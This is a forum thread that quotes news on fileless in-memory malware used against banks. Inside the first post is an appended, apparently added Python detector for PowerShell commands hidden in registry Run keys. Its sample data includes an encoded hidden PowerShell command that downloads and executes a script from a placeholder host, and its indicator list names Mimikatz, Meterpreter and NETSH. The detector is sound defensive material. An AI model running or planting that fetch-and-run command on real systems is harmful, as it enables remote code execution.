
"Invisible" malware



#1 Tx Redneck

    Tx Redneck - The Spam Hunter

  • Anti-Spyware Brigade
  • 5,445 posts
  • Gender: Male
  • Location: On the straight and narrow, stumbling at best, only by God's grace.



Posted 08 February 2017 - 01:37 PM

https://arstechnica....ound-the-globe/


Now, fileless malware is going mainstream, as financially motivated criminal hackers mimic their nation-sponsored counterparts. According to research Kaspersky Lab plans to publish Wednesday, networks belonging to at least 140 banks and other enterprises have been infected by malware that relies on the same in-memory design to remain nearly invisible. Because infections are so hard to spot, the actual number is likely much higher. Another trait that makes the infections hard to detect is the use of legitimate and widely used system administrative and security tools—including PowerShell, Metasploit, and Mimikatz—to inject the malware into computer memory.
The researchers first discovered the malware late last year, when a bank's security team found a copy of Meterpreter—an in-memory component of Metasploit—residing inside the physical memory of a Microsoft domain controller. After conducting a forensic analysis, the researchers found that the Meterpreter code was downloaded and injected into memory using PowerShell commands. The infected machine also used Microsoft's NETSH networking tool to transport data to attacker-controlled servers. To obtain the administrative privileges necessary to do these things, the attackers also relied on Mimikatz. To reduce the evidence left in logs or hard drives, the attackers stashed the PowerShell commands into the Windows registry.

God will not save you from that which he will perfect you through. Dr Voddie Baucham
If more people would get a divorce from themselves, they might learn how to live happily with someone else.
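The persistence pattern the quoted article describes (PowerShell commands stashed in the Windows registry, an encoded command pulling an in-memory stage such as Meterpreter) is something a defender can hunt for in autorun exports. The script below is an added example, not code from the post or from Kaspersky's research: it decodes `-EncodedCommand` payloads and scores Run-key values against indicators named in the article. The registry values are constructed samples and the hostile one points at a placeholder host.

```python
import base64
import re

# Constructed sample Run-key values (as reg.exe or an autoruns export shows them).
# Not from the original post; the hostile entry points at a placeholder host.
SAMPLE_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
    .encode("utf-16le")).decode()
SAMPLE_AUTORUNS = {
    r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive":
        r'"C:\Users\u\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Backup":
        r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\Scripts\backup.ps1",
    r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater":
        "powershell.exe -NoP -W Hidden -Enc " + SAMPLE_ENCODED,
}
# Indicators drawn from the tooling the article names; substring hits on the
# command line plus its decoded payload are leads for triage, not verdicts.
SUSPICIOUS_TOKENS = ("iex", "invoke-expression", "downloadstring",
                     "frombase64string", "netsh", "mimikatz", "meterpreter",
                     "-w hidden", "-nop")
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

def decode_encoded_command(cmdline):
    """Return the UTF-16LE script behind -EncodedCommand, or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None  # an undecodable blob after -enc is itself worth a look

def score_autorun(cmdline):
    """List the reasons a PowerShell autorun looks like registry-stashed code."""
    lowered = cmdline.lower()
    if not any(p in lowered for p in ("powershell", "pwsh")):
        return []
    reasons = []
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        reasons.append("encoded command")
    haystack = lowered + " " + (decoded or "").lower()
    reasons.extend(tok for tok in SUSPICIOUS_TOKENS if tok in haystack)
    return reasons

def find_suspicious(autoruns):
    """Map registry value path -> reasons, for entries with at least one hit."""
    return {path: r for path, cmd in autoruns.items() if (r := score_autorun(cmd))}
```

Running `find_suspicious(SAMPLE_AUTORUNS)` flags only the `Updater` value; the plain `-File` backup script and the non-PowerShell entry produce no hits, which is the point of keying on encoded payloads and tooling names rather than on PowerShell itself.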



#2 duanester

    OpenSuSe Movement

  • Anti-Spyware Brigade
  • 21,785 posts
  • Gender: Male
  • Location: Michigan


Posted 13 February 2017 - 10:09 PM

Pulled up at the local Chase bank ATM and noticed Win Vista stuck in a boot loop. Thought to myself, I never use my bank card in a Win OS. Said the heck with it and hurried to a working Win ATM to get money and make substantial deposits before it went down from some infection :huh:


When you have eliminated the impossible, whatever remains, however improbable, must be the truth !!
Join the next generation of computing, Open Source, and Linux/GNU!
"nvidia license taints kernel"



